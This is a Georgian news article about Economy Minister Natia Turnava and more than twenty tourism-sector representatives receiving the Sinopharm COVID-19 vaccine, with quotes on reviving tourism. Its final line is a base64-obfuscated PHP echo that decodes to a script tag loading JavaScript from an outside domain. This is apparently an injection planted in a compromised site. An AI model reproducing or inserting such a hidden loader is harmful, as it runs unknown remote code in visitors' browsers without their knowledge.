celsiusi
ავერსი საქკაბელი

ეკონომიკის მინისტრი, ტურიზმის სექტორის წარმომადგენლებთან ერთად, დღეს „სინოფარმის“ კორონავირუსის საწინააღმდეგო ვაქცინით აიცრა. როგორც ნათია თურნავამ აღნიშნა, თავს კარგად გრძნობს და ყველას მოუწოდა აქტიური ვაქცინაციისკენ. 

 
„ვაქცინაცია არის ერთადერთი, საუკეთესო და ყველაზე მოკლე გზა იმისთვის, რომ ნორმალურ, ჩვეულებრივ ცხოვრებას დავუბრუნდეთ, რაც შეიძლება სწრაფად აღვადგინოთ ჩვენი ეკონომიკა, ტურიზმი და დარწმუნებული ვარ, მართლაც ყველაზე უსაფრთხო ტურისტული ობიექტები გვექნება ჩვენ, რაც ძალიან მნიშვნელოვანია“, - განაცხადა ნათია თურნავამ მედიის წარმომადგენლებთან. 
 
 მინისტრთან ერთად აკად. ნ. ყიფშიძის სახელობის ცენტრალურ საუნივერსიტეტო კლინიკაში ტურისტული ინდუსტრიის 20-ზე მეტი წარმომადგენელი აიცრა, მათ შორის იყვნენ ასოციაციების თავმჯდომარეები, რესტორნების, მსხვილი და პატარა სასტუმროების დამფუძნებლები და სექტორის სხვა წარმომადგენლები. 
 
„მიუხედავად იმისა, რომ კოვიდ-პანდემია გრძელდება, ჩვენ მოვახერხეთ და შევქმენით პირობები ეკონომიკის აღდგენისთვის. თანდათანობით მიმდინარეობს ტურიზმის აღდგენაც და სასიცოცხლოდ მნიშვნელოვანია, ყველამ დაინახოს მსოფლიოში, რომ საქართველო არის ერთ-ერთი ყველაზე უსაფრთხო, მასპინძელი ქვეყანა. ამიტომაც, მთავრობამ მიიღო გადაწყვეტილება, ტურიზმის სექტორი, სხვა პრიორიტეტულ ჯგუფებთან ერთად, აეყვანა ვაქცინაციის პრიორიტეტულ სიაში და მეც, როგორც ეკონომიკის მინისტრმა, რომელიც ასევე პასუხისმგებელია ტურიზმში მიმდინარე პროცესებზე და პოლიტიკაზე, თავი მოვალედ ჩავთვალე, ჩემი აცრა გამეკეთებინა ტურიზმის ინდუსტრიის სხვადასხვა წარმომადგენელთან ერთად“, - აღნიშნა ეკონომიკის მინისტრმა. 
 
მისივე ინფორმაციით, დღეიდან უკვე კოორდინირებულად დაიწყება ტურისტულ ობიექტებზე დასაქმებული პერსონალის ნებაყოფლობითი ვაქცინაცია. ინტერესი მაღალია და უკვე არსებობს 700-მდე ადამიანის სია, რომლებიც თავისი სურვილით ეწერებიან აცრაზე.  
 
 
1226
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");